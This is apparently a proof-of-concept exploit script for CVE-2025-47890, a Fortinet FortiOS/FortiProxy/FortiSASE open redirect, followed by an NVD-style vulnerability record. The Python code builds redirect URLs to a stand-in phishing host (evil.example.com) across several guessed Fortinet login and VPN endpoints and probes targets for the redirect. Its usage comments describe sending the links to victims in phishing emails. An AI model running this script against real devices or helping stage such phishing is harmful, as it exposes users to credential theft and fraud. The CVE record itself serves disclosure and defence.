CVE-2025-47890

# CVE-2025-47890 - Fortinet Open Redirect PoC # This PoC demonstrates the open redirect vulnerability in Fortinet FortiOS/FortiProxy/FortiSASE import requests import sys from urllib.parse import quote TARGET_HOST = "https://<fortinet-device-ip>" MALICIOUS_URL = "https://evil.example.com/phishing" def exploit_redirect(target_host, redirect_url): """ Craft a malicious HTTP request to exploit the open redirect vulnerability. The Fortinet device will redirect the user to the attacker-controlled URL. """ # Common redirect parameters found in Fortinet web interfaces redirect_params = [ f"{target_host}/login?redirect={quote(redirect_url)}", f"{target_host}/remote/logincheck?redirect={quote(redirect_url)}", f"{target_host}/favicon.ico?redirect={quote(redirect_url)}", f"{target_host}/sslvpn/logon.shtml?redirect={quote(redirect_url)}", f"{target_host}/remote/fgt_lang?lang=en&redirect={quote(redirect_url)}", ] for url in redirect_params: print(f"[+] Crafted malicious URL: {url}") # Verify the redirect behavior try: response = requests.get(url, allow_redirects=False, verify=False, timeout=10) if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') if redirect_url in location: print(f"[VULNERABLE] Redirected to: {location}") return True except Exception as e: print(f"[-] Error: {e}") return False def main(): print("=" * 60) print("CVE-2025-47890 - Fortinet Open Redirect Exploit") print("=" * 60) target = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST evil_url = sys.argv[2] if len(sys.argv) > 2 else MALICIOUS_URL if exploit_redirect(target, evil_url): print("[+] Target is vulnerable to CVE-2025-47890") else: print("[-] Target does not appear vulnerable") if __name__ == "__main__": main() # Usage: # python CVE-2025-47890.py https://fortigate.example.com https://evil.example.com/phishing # # The crafted URL can be sent to victims via phishing emails. # When the victim clicks the link, they are redirected from the legitimate # Fortinet device to the attacker's malicious site.

{"cve": {"id": "CVE-2025-47890", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:38.667", "lastModified": "2026-01-14T10:16:04.977", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An URL Redirection to Untrusted Site vulnerabilities [CWE-601] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiSASE 25.2.a may allow an unauthenticated attacker to perform an open redirect attack via crafted HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.6, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "1B6548FD-E370-45D7-81D5-6EF892810052"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "C1C30E0D-7F09-42D2-9EB1-E2196BD50D75"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "4DA70753-E996-4081-9C13-7F60AC993B09"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisase:25.3.40:*:*:*:feature:*:*:*", "matchCriteriaId": "53197A72-5D08-4938-A415-72C573024BF3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisase:25.3.40:*:*:*:mature:*:*:*", "matchCriteriaId": "2603C391-AEC6-450A-A30A-4F8682F9565D"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-542", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}